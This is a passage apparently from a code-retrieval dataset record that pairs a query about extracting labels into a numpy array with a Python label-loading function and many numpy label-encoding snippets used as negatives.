labels_one_hot[layer_idx, component_idx, labels_dense] = 1\n return labels_one_hot\n else:\n raise ValueError('nlevels can take 1 or 2, not take {}.'.format(nlevels))", "def dense_to_one_hot(labels_dense, num_classes, nlevels=1):\n if nlevels == 1:\n num_labels = labels_dense.shape[0]\n index_offset = np.arange(num_labels) * num_classes\n labels_one_hot = np.zeros((num_labels, num_classes), dtype=np.int32)\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n elif nlevels == 2:\n # assume that labels_dense has same column length\n num_labels = labels_dense.shape[0]\n num_length = labels_dense.shape[1]\n labels_one_hot = np.zeros((num_labels, num_length, num_classes), dtype=np.int32)\n layer_idx = np.arange(num_labels).reshape(num_labels, 1)\n # this index selects each component separately\n component_idx = np.tile(np.arange(num_length), (num_labels, 1))\n # then we use `a` to select indices according to category label\n labels_one_hot[layer_idx, component_idx, labels_dense] = 1\n return labels_one_hot\n else:\n raise ValueError('nlevels can take 1 or 2, not take {}.'.format(nlevels))" ]
[ "0.8250402", "0.807683", "0.80523187", "0.7977843", "0.7908335", "0.7900327", "0.7892233", "0.7869711", "0.7849721", "0.7849721", "0.7826951", "0.7826122", "0.77677035", "0.7765413", "0.77540547", "0.77540547", "0.77540547", "0.77489346", "0.7742955", "0.7737176", "0.77226317", "0.77123284", "0.7711196", "0.769438", "0.7690543", "0.7673946", "0.7672027", "0.76648885", "0.76598144", "0.76598144", "0.76598144", "0.76598144", "0.7649487", "0.7638954", "0.76354444", "0.7622406", "0.7622406", "0.7620295", "0.7606602", "0.7604131", "0.76039714", "0.76016307", "0.7587813", "0.7555525", "0.75284547", "0.75079954", "0.74816835", "0.7478094", "0.7469378", "0.7453988", "0.7452055", "0.74479073", "0.74472725", "0.74157184", "0.73598224", "0.7352546", "0.7313677", "0.7300708", "0.72989976", "0.72958356", "0.72529936", "0.7244565", "0.723758", "0.72373277", "0.7229422", "0.7219798", "0.7210118", "0.71689993", "0.7167833", "0.71630746", "0.71630746", "0.7150164", "0.71444476", "0.71444476", "0.71444476", "0.71444476", "0.71299696", "0.7119454", "0.711388", "0.7109622", "0.71089375", "0.7103112", "0.7095776", "0.7073025", "0.7062782", "0.70482117", "0.703764", "0.7036766", "0.7032162", "0.70132685", "0.6992898", "0.6975648", "0.69754434", "0.69754434", "0.69713694", "0.69682264", "0.6957243", "0.6925733", "0.69248796", "0.69248796" ]
0.76462805
33
Extract the labels into a 1D uint8 numpy array [index].
def extract_labels(nlabels,filename, one_hot=False): print('Extracting', filename,'bbbccicicicicib') labels=numpy.loadtxt(filename,dtype='int64') if one_hot: print("LABELS ONE HOT") print(labels.shape) XXX=dense_to_one_hot(labels,nlabels) print(XXX.shape) return dense_to_one_hot(labels,nlabels) print("LABELS") print(labels.shape) return labels
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def labels_array(self):\n return _build_label_vector_rows(\n [[(label, 1)] for label in self.labels], self.training_labels)[1:].T", "def array2(self):\r\n profbox(whoami())\r\n # research\r\n inputLabelID = self.__needleLabelSelector.currentNode().GetID()\r\n labelnode = slicer.mrmlScene.GetNodeByID(inputLabelID)\r\n i = labelnode.GetImageData()\r\n shape = list(i.GetDimensions())\r\n shape.reverse()\r\n a = vtk.util.numpy_support.vtk_to_numpy(i.GetPointData().GetScalars()).reshape(shape)\r\n labels = []\r\n val = [[0, 0, 0] for i in range(a.max() + 1)]\r\n for i in xrange(2, a.max() + 1):\r\n w = numpy.transpose(numpy.where(a == i))\r\n # labels.append(w.mean(axis=0))\r\n val[i] = [0, 0, 0]\r\n val[i][0] = w[int(round(w.shape[0] / 2))][2]\r\n val[i][1] = w[int(round(w.shape[0] / 2))][1]\r\n val[i][2] = w[int(round(w.shape[0] / 2))][0]\r\n if val[i] not in self.previousValues:\r\n labels.append(val[i])\r\n self.previousValues.append(val[i])\r\n return labels", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(10000)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_labels(self) -> np.ndarray:\n if self.i - 1 >= self.k:\n logging.error(\"No more training iterations!!\")\n return np.array([])\n _, test = self.indexes[self.i - 1]\n return self.labels.take(test, axis=-1)", "def array2(self):\n print \"array2\"\n msgbox(whoami())\n #research\n inputLabelID = self.__needleLabelSelector.currentNode().GetID()\n labelnode=slicer.mrmlScene.GetNodeByID(inputLabelID)\n i = labelnode.GetImageData()\n shape = list(i.GetDimensions())\n shape.reverse()\n a = vtk.util.numpy_support.vtk_to_numpy(i.GetPointData().GetScalars()).reshape(shape)\n labels=[]\n val=[[0,0,0] for i in range(a.max()+1)]\n for i in xrange(2,a.max()+1):\n w =numpy.transpose(numpy.where(a==i))\n # labels.append(w.mean(axis=0))\n val[i]=[0,0,0]\n val[i][0]=w[int(round(w.shape[0]/2))][2]\n val[i][1]=w[int(round(w.shape[0]/2))][1]\n val[i][2]=w[int(round(w.shape[0]/2))][0]\n if val[i] not in self.previousValues:\n labels.append(val[i])\n self.previousValues.append(val[i])\n return labels", "def create_label_array(el):\n num_digits = len(el) # first element of array holds the count\n labels_array = np.ones([MAX_LABELS+1], dtype=int) * 10\n labels_array[0] = num_digits\n for n in range(num_digits):\n if el[n] == 10: el[n] = 0 # reassign 0 as 10 for one-hot encoding\n labels_array[n+1] = el[n]\n return labels_array", "def create_label_array(el):\n num_digits = len(el) # first element of array holds the count\n labels_array = np.ones([MAX_LABELS+1], dtype=int) * 10\n labels_array[0] = num_digits\n for n in range(num_digits):\n if el[n] == 10: el[n] = 0 # reassign 0 as 10 for one-hot encoding\n labels_array[n+1] = el[n]\n return labels_array", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def get_label_color_mapping(idx):\n # https://gist.github.com/wllhf/a4533e0adebe57e3ed06d4b50c8419ae\n def bitget(byteval, ch):\n return (byteval & (1 << ch)) != 0\n r = g = b = 0\n for j in range(8):\n r = r | (bitget(idx, 0) << 7 - j)\n g = g | (bitget(idx, 1) << 7 - j)\n b = b | (bitget(idx, 2) 
<< 7 - j)\n idx = idx >> 3\n return np.array([r, g, b], dtype=np.uint8)", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def encode_labels(labels, nclass=5):\n y = np.zeros((len(labels), nclass)).astype('float32')\n for j, yj in enumerate(labels):\n for i in range(nclass):\n if i+1 == np.floor(yj) + 1:\n y[j, i] = yj - np.floor(yj)\n if i+1 == np.floor(yj):\n y[j, i] = np.floor(yj) - yj + 1\n return y", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def _get_labels(self, ind):\n pass", "def preprocess_labels(label, number_slices):\n labels = [[] for i in range(np.array(label).shape[0])]\n\n for j in range(np.array(label).shape[0]):\n if type(label) is not np.ndarray:\n for i in range(number_slices):\n labels[j].append(np.array(Image.open(label[0][i]), dtype=np.uint8))\n\n label = np.array(labels[0])\n label = label.transpose((1, 2, 0))\n max_mask = np.max(label) * 0.5\n label = np.greater(label, max_mask)\n label = np.expand_dims(label, axis=0)\n\n return label", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n #return self.labels[index, :, :]\n return self.labels[index]", "def encode_labels(labels, nclass=5):\n Y = np.zeros((len(labels), nclass)).astype('float32')\n for j, y in enumerate(labels):\n for i in range(nclass):\n if i+1 == np.floor(y) + 1:\n Y[j,i] = y - np.floor(y)\n if i+1 == np.floor(y):\n Y[j,i] = np.floor(y) - y + 1\n return Y", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def __get_ohe_label__(self, label_idx) -> List[int]:\n\n label = [0] * self.n_classes\n label[label_idx] = 1\n\n return label", "def fluxes_to_labels(fluxes: np.ndarray) -> np.ndarray:\n return ((1 - fluxes) // 2).astype(np.int8)", "def label2img2(label):\n buff = F.argmax(label, axis = 1)\n buff = F.vstack((buff, buff, buff))\n\n buff.data[0][buff.data[0] == 0] = 255\n buff.data[1][buff.data[1] == 0] = 0\n buff.data[2][buff.data[2] == 0] = 0\n\n buff.data[0][buff.data[0] == 1] = 0\n buff.data[1][buff.data[1] == 1] = 255\n buff.data[2][buff.data[2] == 1] = 0\n\n buff.data[0][buff.data[0] == 2] = 0\n buff.data[1][buff.data[1] == 2] = 0\n buff.data[2][buff.data[2] == 2] = 255\n\n return buff.data.astype(np.uint8)", "def binary_labels(output_labels, return_index=False, label_list=None):\n\n # Populate label list if required, otherwise input is used (e.g. 
for\n # evaluationd data to follow same format as training)\n if label_list == None:\n label_list = [\"OTHER#OTHER\"]\n\n for element in output_labels:\n for quality in element:\n if quality[0] not in label_list:\n label_list.append(quality[0])\n\n labels_binary = []\n\n empty_label = []\n\n for element in label_list:\n empty_label.append(0)\n\n\n # TODO: Array of single aspect variable arrays.\n for element in output_labels:\n labels_binary.append(empty_label[:])\n for quality in element:\n if quality[0] in label_list:\n labels_binary[-1][label_list.index(quality[0])] = 1\n else:\n labels_binary[-1][label_list.index(\"OTHER#OTHER\")] = 1\n # label_index[quality[0]] = label_index['max'] + 1\n # label_index['max'] += 1\n # labels_binary[-1][label_index[quality[0]]] = 1\n\n if return_index:\n # label list acts as a lookup incase of printing classification results\n return np.array(labels_binary), label_list\n else:\n return np.array(labels_binary)", "def label2img(label):\n color=[[255,0,0],[0,255,0],[0,0,255],[0,0,0],[0,255,255]]\n buff = F.argmax(label, axis = 1)\n out = np.zeros((3,buff.shape[1],buff.shape[2]))\n \n for k in range(5):\n for i in range(buff.shape[1]):\n for j in range(buff.shape[2]):\n if(buff.data[0][i][j] == k):\n out[0][i][j] = color[k][0]\n out[1][i][j] = color[k][1]\n out[2][i][j] = color[k][2]\n\n return out.astype(np.uint8)", "def load_label(self, idx):\n im = open('{}/GTTXT/{}.txt'.format(root_dir, idx))\n\t#print(type(im.readlines()[0].rstrip(\"\\n\")))\n rgb_label = [i.rstrip(\"\\n\").split(\" \") for i in im.readlines()]\n\tlabel=[]\t\n\tfor i in rgb_label:\n\t\tlabel+=[int(j) for j in i]\n\tlabel=np.array(label).reshape(720,960)\n\tlabel[label==-1]=12\n\t#print(np.unique(label))\n #label = label[np.newaxis, ...]\n return label", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_labels(self):\n return self.labels[1:]", "def decode_labels(mask, num_classes=41):\n h, w = mask.shape\n outputs = np.zeros((h, w, 3), dtype=np.uint8)\n\n img = Image.new('RGB',(len(mask[0]), len(mask)))\n pixels = img.load()\n for j_, j in enumerate(mask):\n for k_, k in enumerate(j):\n if k < num_classes:\n pixels[k_, j_] = label_colours[k]\n outputs = np.array(img)\n return outputs", "def rgb_to_2D_label(label):\n label_seg = np.zeros(label.shape,dtype=np.uint8)\n label_seg [np.all(label == Building,axis=-1)] = 0\n label_seg [np.all(label==Land,axis=-1)] = 1\n label_seg [np.all(label==Road,axis=-1)] = 2\n label_seg [np.all(label==Vegetation,axis=-1)] = 3\n label_seg [np.all(label==Water,axis=-1)] = 4\n label_seg [np.all(label==Unlabeled,axis=-1)] = 5\n \n label_seg = label_seg[:,:,0] #Just take the first channel, no need for all 3 channels\n \n return label_seg", "def return_histogram_labels():\n return list(labels)", "def _labels(path):\r\n with gzip.open(path) as f:\r\n # First 8 bytes are magic_number, n_labels\r\n integer_labels = np.frombuffer(f.read(), 'B', offset=8)\r\n\r\n def _onehot(integer_labels):\r\n \"\"\"Return matrix whose rows are onehot encodings of integers.\"\"\"\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot\r\n\r\n return _onehot(integer_labels)", "def 
retrieve_labels(file, label_indices):\n\n\t# Initialize numpy matrix to store the images\n\tlabels = np.zeros((len(label_indices), 10))\n\n\twith open(file, \"rb\") as f:\n\t\t# Intialize counters\n\t\ti = 0\n\t\tlabel_number = 0\n\n\t\t# Read first byte\n\t\tbyte = f.read(1)\n\n\t\t# Find each image in the data file\n\t\tfor label_index in label_indices:\n\t\t\t# Read in bytes until you arrive at the label\n\t\t\twhile byte and (i < (label_index + 8)):\n\t\t\t\tbyte = f.read(1)\n\t\t\t\ti += 1\n\n\t\t\t# Store label value in numpy array\n\t\t\tvalue = int.from_bytes(byte, \"big\")\n\t\t\tlabels[label_number] = np.zeros(10)\n\t\t\tlabels[label_number, value] = 1\n\n\t\t\t# Increment to next label\n\t\t\tlabel_number += 1\n\n\treturn labels", "def to_categorical(index_label, num_classes):\n return index_label, np.eye(num_classes, dtype='uint8')[index_label]", "def convertLabels(self, labels):\n counter = 0\n numericLabels = []\n for label in labels:\n if label not in self.labelDict:\n self.labelDict[label] = counter\n self.backwards_conversion[counter] = label\n counter += 1\n numericLabels += [self.labelDict[label]]\n return np.array(numericLabels)", "def read_labels(labels_path):\n data = []\n with open(labels_path, 'r') as f:\n for line in f:\n line = line.split()\n sample = (line[0], int(line[1]))\n data.append(sample)\n \n dtype = [('video', '<U50'), ('label', int)]\n X = np.array(data, dtype=dtype)\n X = np.sort(X, order='video')\n return X", "def encode_label(label: np.array, nb_classes: int):\n encoded = np.zeros(nb_classes)\n encoded[int(label)] = 1.\n return encoded", "def compute_labels(pos, neg):\n labels = np.zeros(len(pos) + len(neg), dtype=np.int8)\n labels[:len(pos)] = 1\n labels[len(pos):] = 0\n return labels", "def one_hot_encoding((uri, label), all_labels):\n labels = [0]*NUM_LABELS\n for i, l in enumerate(all_labels):\n if label == l:\n labels[i] = 1\n yield uri, labels", "def indices_of_label(self, label_name):\n return self.indices_of('label', label_name)", "def get_one_hot_encoded(self, label):\n try:\n label = str(label, 'utf-8').lower()\n except:\n label = str(label).lower() # hack for pytest TODO\n vector = np.zeros(self._labels_dim, dtype=int)\n index = self.get_label_2_index(label=label)\n vector[index] = 1\n return vector", "def get_uci_labels():\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\n numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\n promoted_to = ['q', 'r', 'b', 'n']\n\n for l1 in range(8):\n for n1 in range(8):\n destinations = [(t, n1) for t in range(8)] + \\\n [(l1, t) for t in range(8)] + \\\n [(l1 + t, n1 + t) for t in range(-7, 8)] + \\\n [(l1 + t, n1 - t) for t in range(-7, 8)] + \\\n [(l1 + a, n1 + b) for (a, b) in\n [(-2, -1), (-1, -2), (-2, 1), (1, -2),\n (2, -1), (-1, 2), (2, 1), (1, 2)]]\n\n for (l2, n2) in destinations:\n if (l1, n1) != (l2, n2) and l2 in range(8) and n2 in range(8): # noqa: E501\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2] # noqa: E501\n labels_array.append(move)\n\n for l1 in range(8):\n letter = letters[l1]\n for p in promoted_to:\n labels_array.append(letter + '2' + letter + '1' + p)\n labels_array.append(letter + '7' + letter + '8' + p)\n if l1 > 0:\n l_l = letters[l1 - 1]\n labels_array.append(letter + '2' + l_l + '1' + p)\n labels_array.append(letter + '7' + l_l + '8' + p)\n if l1 < 7:\n l_r = letters[l1 + 1]\n labels_array.append(letter + '2' + l_r + '1' + p)\n labels_array.append(letter + '7' + l_r + '8' + p)\n return labels_array", "def to_inds_list(frame_labels: 
np.ndarray, unlabeled_label: int = 0) -> list[np.ndarray]:\n segment_inds = np.nonzero(frame_labels != unlabeled_label)[0]\n return np.split(segment_inds, np.where(np.diff(segment_inds) != 1)[0] + 1)", "def get_labels(self) -> np.array:\n nb_samples = len(self.list_IDs)\n M = np.empty((nb_samples, *self.dim[:-1], 3))\n\n for i, ID in enumerate(self.list_IDs):\n M[i,] = np.load(self.mask_data_path + ID, allow_pickle=True)\n\n return M", "def get_labels(self) -> np.ndarray:\n return self._dataset.get_labels()[self._ids]", "def labels(self) -> ndarray:\n return self._labels", "def encode(self, labels):\n # use 2 channel since BGR2RGB convertion\n labels = labels.astype(float)[..., 2] / 255 \n return labels[..., np.newaxis]", "def labels2Vec(labels):\r\n global dict_words_n_vectors\r\n\r\n for i in range(len(labels)):\r\n if labels[i] in dict_words_n_vectors:\r\n labels[i] = dict_words_n_vectors[labels[i]]\r\n else:\r\n labels[i] = np.zeros(300)\r\n return np.array(labels, dtype=\"float32\")", "def voc_label_indices(colormap, colormap2label):\n colormap = np.array(colormap.convert(\"RGB\")).astype('int32')\n idx = ((colormap[:, :, 0] * 256 + colormap[:, :, 1]) * 256\n + colormap[:, :, 2])\n return colormap2label[idx]", "def _extract_labels(self, samples: List):\n targets = [\n self.sp_model.encode(sample[2].lower().replace(\"<unk>\", \"<garbage>\").replace(\"\\n\", \"\"))\n for sample in samples\n ]\n targets = [\n [ele if ele != 4 else self.sp_model.unk_id() for ele in target] for target in targets\n ] # map id of <unk> token to unk_id\n lengths = torch.tensor([len(elem) for elem in targets]).to(dtype=torch.int32)\n targets = torch.nn.utils.rnn.pad_sequence(\n [torch.tensor(elem) for elem in targets],\n batch_first=True,\n padding_value=1.0,\n ).to(dtype=torch.int32)\n return targets, lengths", "def _extract_labels(self, filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = self._read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n if one_hot:\n return self._dense_to_one_hot(labels)\n return labels", "def get_label(self):\n oshape = (ctypes.c_uint * 2)()\n ostride = ctypes.c_uint()\n ret = cxnlib.CXNIOGetLabel(self.handle,\n oshape, ctypes.byref(ostride))\n return ctypes2numpyT(ret, [x for x in oshape], 'float32', ostride.value)", "def encode_labels(self, lilabs):\n\n y = []\n for lab in lilabs:\n y.append([1 if l in lab else 0 for l in self.labels])\n\n return np.array(y, dtype=float)", "def fromIndex(index):\n return Data.labels[index]", "def get_label_ix_mapping(labels):\n return {label: i for i, label in enumerate(labels)}", "def provide_label(self):\r\n return [(k, tuple([1] + list(v.shape[1:]))) for k, v in self.label]", "def encode_ST_labels(labels):\n return np.array([1 if sentiment == 'bullish' else 0 for sentiment in labels])", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n return dense_to_one_hot(labels)", "def label_to_one_hot(label, num_of_class=2):\r\n import numpy as np\r\n one_hot = np.zeros((len(label), 
num_of_class), dtype=np.uint8)\r\n for i in range(len(label)):\r\n one_hot[i, int(label[i] - 1)] = 1 # label is 1 and 2\r\n\r\n return one_hot", "def load_labels(labels_dir, trial_name):\n labels_path = labels_dir + trial_name + \".txt\"\n raw_labels_data = np.genfromtxt(labels_path, dtype=np.int,\n converters=LABELS_CONVERTERS,\n usecols=LABELS_USECOLS)\n #print(\"rawlabelsdata: \", raw_labels_data)\n #print(get_first_frame(labels_path))\n frames = np.arange(get_first_frame(labels_path), get_last_frame(labels_path)+1, dtype=np.int)\n #print(\"frames: \", frames)\n #print(frames.shape)\n #labels = np.zeros(frames.shape, dtype=np.int)\n labels1 = []\n #print(labels)\n for start, end, label in raw_labels_data:\n #mask = (frames >= start) & (frames <= end)\n #print(start)\n #print(end)\n i = start\n while(i<end):\n if(i%6 == 0):\n labels1.append(label)\n i = i+1\n\n #labels[mask] = label\n #print(\"labels[mask]: \",labels[mask])\n labels1 = np.array(labels1)\n #print(labels1)\n labels_data = labels1.reshape(-1,1)\n #print(labels1.shape)\n #print(\"labels: \", labels_data)\n \n return labels_data", "def _convert_to_onehot_labels(seg_label, num_classes):\n\n batch_size = seg_label.size(0)\n onehot_labels = seg_label.new_zeros((batch_size, num_classes))\n for i in range(batch_size):\n hist = seg_label[i].float().histc(\n bins=num_classes, min=0, max=num_classes - 1)\n onehot_labels[i] = hist > 0\n return onehot_labels", "def generate_labels(n_samples):\n return np.ones([n_samples, 1]), np.zeros([n_samples, 1])", "def labels_to_labels(class_labels, num_classes =4):\n levels = []\n for label in class_labels:\n levels_from_label = label_to_levels(int(label), num_classes=num_classes)\n levels.append(levels_from_label)\n return torch.stack(levels).cuda()", "def read_labels(labels_path):\n with open(labels_path, 'r') as file:\n data = file.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n return data", "def labels_(self) -> DNDarray:\n return self._labels", "def infer_data_labels(X_labels, cluster_labels):\r\n #Empty array of len(X)\r\n predicted_labels = np.zeros(len(X_labels)).astype(np.uint8)\r\n \r\n for i, cluster in enumerate(X_labels):\r\n for key, value in cluster_labels.items():\r\n if cluster in value:\r\n predicted_labels[i] = key\r\n \r\n return predicted_labels", "def convert_to_compact_array(data, label):\n indices = np.arange(230 * 230).reshape(230, 230)\n t1, t2, pd, dn = label\n m = np.ma.masked_equal(pd, 0)\n t1_masked, t2_masked, pd_masked, indices_masked, dn_masked = \\\n np.ma.masked_array(t1, m.mask), np.ma.masked_array(t2, m.mask), \\\n np.ma.masked_array(pd, m.mask), np.ma.masked_array(indices, m.mask), \\\n np.ma.masked_array(dn, m.mask)\n t1_compressed, t2_compressed, pd_compressed, indices_compressed, dn_compressed = \\\n np.ma.compressed(t1_masked), np.ma.compressed(t2_masked), \\\n np.ma.compressed(pd_masked), np.ma.compressed(indices_masked), \\\n np.ma.compressed(dn_masked)\n\n fp_compressed = []\n for index in indices_compressed:\n x = int(index // 230)\n y = int(index % 230)\n fp_compressed.append(data[x][y])\n fp_compressed = np.asarray(fp_compressed)\n # recon = np.zeros((230, 230))\n # x = indices_compressed // 230\n # y = indices_compressed % 230\n # recon[x, y] = t1_compressed[np.arange(len(indices_compressed))]\n\n label = np.asarray([t1_compressed, t2_compressed, pd_compressed, indices_compressed, dn_compressed])\n label = np.transpose(label)\n data = fp_compressed\n return data, label", "def indices_to_one_hot(data, 
nb_classes):\n\ttargets = np.array(data).reshape(-1)\n\treturn np.eye(nb_classes)[targets]", "def extract_npy(self, mode='train', devices='abc'):\n\n data = []\n label = []\n with h5py.File(self.dev_h5_path, 'r') as f:\n audios = f[mode].keys()\n for audio in audios:\n # extract according to device\n if f[mode][audio].attrs['device'] in devices:\n data.append(np.array(f[mode][audio].value))\n label.append(np.array(f[mode][audio].attrs['label']))\n # concat data along existing axis 0\n data = np.concatenate(data, axis=0)\n le = preprocessing.LabelBinarizer()\n label_onehot = le.fit_transform(np.array(label))\n return data, label_onehot", "def transform_labels(self, labels):\n # Fallback:\n # return self.encoder.transform(labels)\n classes = list(self.classes_())\n return [classes.index(label) for label in labels]", "def transform_labels(self, labels):\n # Fallback:\n # return self.encoder.transform(labels)\n classes = list(self.classes_())\n return [classes.index(label) for label in labels]", "def create_TargetLabel(dataset):\n label_Array = dataset['close_-1_r'].shift(-1)\n label_Array = label_Array.apply(lambda x:1 if x>0.0000 else 0)\n return label_Array", "def _binary_2d_label_to_sparse_value(labels):\n indices = []\n values = []\n batch = 0\n for row in labels:\n label = 0\n xi = 0\n for x in row:\n if x == 1:\n indices.append([batch, xi])\n values.append(label)\n xi += 1\n else:\n assert x == 0\n label += 1\n batch += 1\n shape = [len(labels), len(labels[0])]\n return sparse_tensor.SparseTensorValue(\n np.array(indices, np.int64), np.array(values, np.int64),\n np.array(shape, np.int64))", "def get_labels(self):\n\n for i in range(self.p.shape[0]):\n self.find(i)\n return self.p", "def read_labels(idx_filename):\n return IdxFileLoader().load(idx_filename, gzip_compressed=True)[-1]", "def colors_for_labels():\n colors = [(i * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1]) % 255).astype(np.uint8) for i in range(len(CATEGORY))]\n #colors = np.array(range(len(COCO_INSTANCE_CATEGORY_NAMES))) * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\n #colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def encode_labelmap(colour_img, colourlabelmap):\n colour_img = colour_img.astype(int)\n labels = np.zeros((colour_img.shape[0], colour_img.shape[1]), dtype=np.int16)\n for label_id, colour in enumerate(colourlabelmap):\n labels[np.where(np.all(colour == colour_img, axis=-1))] = label_id\n\n return labels", "def label2onehot(self, batch_size, labels):\r\n dim = 6\r\n out = torch.zeros(batch_size, dim)\r\n out[np.arange(batch_size), labels] = 1\r\n return out", "def groupByLabel( y ):\n index = []\n for i in np.unique(y): # pour toutes les classes\n ind, = np.where(y==i)\n index.append(ind)\n \n return index", "def get_label(self, indices=None):\n if indices is None:\n indices = list(range(0, self.get_sample_size()))\n elif isinstance(indices, collections.abc.Iterable):\n indices = sorted(list(set(indices)))\n else:\n indices = [indices]\n\n if len(indices) == 0:\n return []\n partitions = self.get_partitions(self.persistence)\n labels = self.X.shape[0] * [None]\n for label, partition_indices in partitions.items():\n for idx in np.intersect1d(partition_indices, indices):\n labels[idx] = label\n\n labels = np.array(labels)\n if len(indices) == 1:\n return labels[indices][0]\n return labels[indices]", "def load_labels(filename):\n\n file_path = os.path.join(DATA_DIR, filename)\n with open(file_path, 'rb') as f:\n b = f.read()\n\n magic, n_labels = (struct.unpack('>i', 
b[i*4:(i+1)*4]) for i in range(2))\n\n assert magic[0] == 2049, \"bad magic number, what do?\"\n\n label_stream = array.array('B', b[8:])\n \n assert len(label_stream) == n_labels[0], \"mismatch in label length\"\n \n # label_stream is actually type array.array, which is iterable surely.\n # i'll convert it anyway...\n return tuple(label_stream)", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def indices_to_one_hot(data, nb_classes):\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]", "def get_label(path): # get ED ES label\n label_csv = pd.read_csv(path)\n label_list = []\n trans_list = list(np.array(label_csv).astype(np.int32))\n for i in trans_list:\n temp = []\n for j in i:\n if j >= 0:\n temp.append(j)\n label_list.append(temp)\n return label_list", "def __getitem__(self, idx):\n record = self.records[idx]\n return np.array(record['feat']), np.array(record['label'], dtype=np.int64)", "def encode_labels(self, y, num_labels):\n onehot = np.zeros((num_labels, y.shape[0]))\n for i in range(y.shape[0]):\n onehot[y[i], i] = 1.0\n return onehot", "def load_labels(label_path):\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index", "def make_raw_data(self):\n\t\tfilter = self.predictions.max(1) > self.confidence\n\t\tdata = self.test_data[filter, :]\n\t\tlabels = self.predictions[filter, :].argmax(1).astype(uint16) + 1\n\t\treturn data, labels", "def label_from_index(self, index):\n assert self.labels is not None, \"Labels not processed\"\n return self.labels[index]", "def digit_indices_to_labels(digits_run1, digits_run2):\n labels_run1, labels_run2 = np.zeros(shape=256), np.zeros(shape=256)\n for finger_i in range(1, 6):\n labels_run1[digits_run1[finger_i - 1]] = finger_i\n labels_run2[digits_run2[finger_i - 1]] = finger_i\n return labels_run1, labels_run2", "def _extract_class(labels: List[int], class_index: int):\n class_ids = [i for i, label in enumerate(labels) if label == class_index]\n return class_ids", "def labels(self):\n return self._labels", "def mask_to_label(mask):\n # get the image size\n h, w, _ = mask.shape\n\n # build a color to label map\n color_to_idx = {}\n for label in class_info:\n color_to_idx[class_info[label].color] = class_info[label].id\n\n # generate label matrix\n label = np.zeros((h, w), dtype=np.uint8)\n for y in range(h):\n for x in range(w):\n b, g, r = mask[y, x]\n color = (r, g, b)\n label[y, x] = color_to_idx[color]\n\n return label", "def getLabels(self):\n return self.numToLabel", "def get_label(self, label):\n\n return torch.from_numpy(np.array(label)).long()", "def pixel_label_vector(self, pixel_index):\n return self.label_vector", "def get_label_with_index(labels, index):\n return labels[np.where(labels[:, 0] == index)]", "def label_encode(data: List) -> [np.ndarray, List[LabelEncoder]]:\n labels_encoded = []\n data_encoded = np.array(data)\n for i in range(data_encoded.shape[1]):\n le = preprocessing.LabelEncoder()\n le.fit(data_encoded[:, i])\n 
